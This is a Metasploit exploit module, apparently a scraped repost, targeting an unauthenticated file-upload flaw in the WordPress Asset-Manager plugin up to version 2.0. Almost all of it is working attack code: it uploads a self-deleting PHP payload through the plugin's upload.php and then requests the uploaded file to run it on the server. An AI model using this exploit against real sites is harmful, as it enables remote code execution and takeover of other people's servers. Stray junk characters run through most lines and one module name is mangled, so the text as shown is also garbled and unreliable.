9 |) J0 Z, Y$ w##, ?# O! R l' V# @- ]1 g
# This file is part of the Metasploit Framework and may be subject to ) J" O7 |$ R$ c, X: b- ?+ z0 g9 q# redistribution and commercial restrictions. Please see the Metasploit# _. i" d8 ?5 P' d) }6 \
# Framework web site for more information on licensing and terms of use. / a$ O9 ^5 Z/ \: v# http://metasploit.com/framework/ ! D* Q: I, N! ^& X% P/ S' B##& o0 w2 X& S: `% l; r! k
- x, e; T9 J& I0 C- i" g5 L; x
require 'msf/core'2 F8 a4 U4 Q4 f7 D
require 'msf/core/exploit/php_exe': G+ U. ~) A. w" k Q( _" V/ r
* I; O- X. L4 B% S6 p8 ~
class Metasploit3 < Msf::Exploit::Remote" J' ]& n- W# Y. p( I7 f. a
Rank = ExcellentRanking( Y# l/ {3 `* ?3 @
! R7 G4 r T, c: ~1 S$ O6 l
include Msf::Exploit::Remote::HttpClient " d# b2 U/ o; H1 D* X include Msf::Exploit:hpEXE ( }/ k9 i0 K; U: U. E. X * u. L" ?* o' n
def initialize(info = {})* Q# P" F0 o; o# d
super(update_info(info,* T$ _8 J }; E( z1 K3 R6 s
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability', 9 c4 I/ K% b" G+ Y0 I/ N8 q% j 'Description' => %q{ : @2 i+ |! Y! Z' ]$ B0 L% [ This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress ! b- c& \" s* ~& N0 W( F/ F plugin. By abusing the upload.php file, a malicious user can upload a file to a 3 ~9 w6 V9 l) K; K temp directory without authentication, which results in arbitrary code execution. ' n+ M6 m; `& A* M$ d1 D }, * Q5 n7 H# D' `+ x* O 'Author' => : {) l1 d: L$ `. ]3 K3 {; W, V [3 g7 x3 c5 J3 L, y
'Sammy FORGIT', # initial discovery 1 n: L4 p- J, \& X! U4 [4 ? 'James Fitts <fitts.james[at]gmail.com>' # metasploit module / K+ x# @9 p# g n- o+ e' x ],* s) P4 J2 q. }7 Z8 B# S6 s
'License' => MSF_LICENSE, 6 H" A! W) a3 c B+ e 'References' =>9 I7 [+ o6 [$ l) q5 f: y4 ?
[+ g$ A4 S# X( F3 q) h6 g4 q
[ 'OSVDB', '82653' ],+ q$ L; T3 g- k
[ 'BID', '53809' ],6 y4 a% a! {9 [/ p
[ 'EDB', '18993' ],1 e8 z. o+ E- U/ l* c* n* K
[ 'URL', 'http:// www.myhack58.com /' ]6 @+ k3 V4 t& H
], * F/ c; |4 `6 K 'Payload' => 3 ^$ G7 } X! f2 @ { 4 N# c2 K4 R" T* X' m. a) x- n; i 'BadChars' => "\x00", # G( o0 B* x, w; `5 O. n }, - ? i6 `. D/ S* z 'Platform' => 'php', ) v& W; O! |; ^& ~7 j" S" a 'Arch' => ARCH_PHP,! [% f9 s- I: T2 [. x6 c6 l
'Targets' => 4 p) \+ ]# p# E2 K% f [+ ~4 g% n, W, @* B8 N
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],. h: y" c( @) @$ ]1 {
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] 7 o# h3 s' a9 D: v6 l ],1 E# w( J4 r6 g0 E6 P
'DefaultTarget' => 0,! {" t% Z# ]5 K- z
'DisclosureDate' => 'May 26 2012'))# V/ J8 ^- A. D1 B; `. F
. z* {9 |* G4 P8 Z3 H" d8 K register_options( ( j' N# M) X$ J% b9 {9 L P' L [* c! L; @" H4 M. E
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])/ K( R. O \5 z
], self.class): Z; M0 H) E& |- n% i
end / T$ ~6 _. g4 l$ `9 q # Q; W7 Q& Y$ D' r9 [
def exploit 6 O2 j$ R% p _' ? uri = target_uri.path6 r) z' W/ b( S; l2 Y$ N
uri << '/' if uri[-1,1] != '/'# P2 w9 Q6 c' V
peer = "#{rhost}:#{rport}"3 v. T- E' z; u) V
payload_name = "#{rand_text_alpha(5)}.php"& c) Z8 B/ p- E7 r6 L
php_payload = get_write_exec_payload(:unlink_self=>true)! Q. ~+ ~1 Z! R- L! U2 H
# Y2 D( b1 w4 B( u9 s; g data = Rex::MIME::Message.new * U7 j8 I8 V. D9 H& P6 R data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")8 d' w: W* \7 R
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 I8 | w; S3 R: Y
: `$ U2 {/ U5 v* Y" J( Q' Z& i
print_status("#{peer} - Uploading payload #{payload_name}") d9 h, n# b6 G3 X1 l# L. F( _
res = send_request_cgi({ 6 S* m, ]4 D" e' h4 \: q& V% u 'method' => 'POST',8 | ]8 e" Q! i; e9 y3 a
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",/ O3 _0 X9 k. L
'ctype' => "multipart/form-data; boundary=#{data.bound}", " B. k6 x$ S+ @: M1 _" h 'data' => post_data8 ~) O" J* j( r8 b
}) 7 |5 G* F- p) n% G8 Q3 @8 H0 V & a8 d1 {$ ]$ J6 Z ]4 K# s if not res or res.code != 200 or res.body !~ /#{payload_name}/ * X+ l @0 v4 t& y5 x fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") + E& P" k8 ^* g0 D8 q/ P$ Cend* H( ~% _+ l( I
0 J7 O) q" i5 E8 b6 @; l
print_status("#{peer} - Executing payload #{payload_name}")% s. ?0 S5 i% i8 E1 E
res = send_request_raw({% j- o( @, s3 ]3 l! U8 B
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", + E& e! m. {3 t3 i2 j# O" T 'method' => 'GET'8 P9 l9 Z, y, e0 g; |
}) , G7 M a0 c, c1 I5 p - }9 Y: [, L, G' Q; ? if res and res.code != 200 3 l+ L* H6 V+ \- } fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")" Y0 |$ h- n* j
end7 e; c6 {; Y4 z
end ) s# |, v+ i, @: E+ P" g" S. fend* K7 [& c. k. S, ~4 G- ` b8 O
hpEXE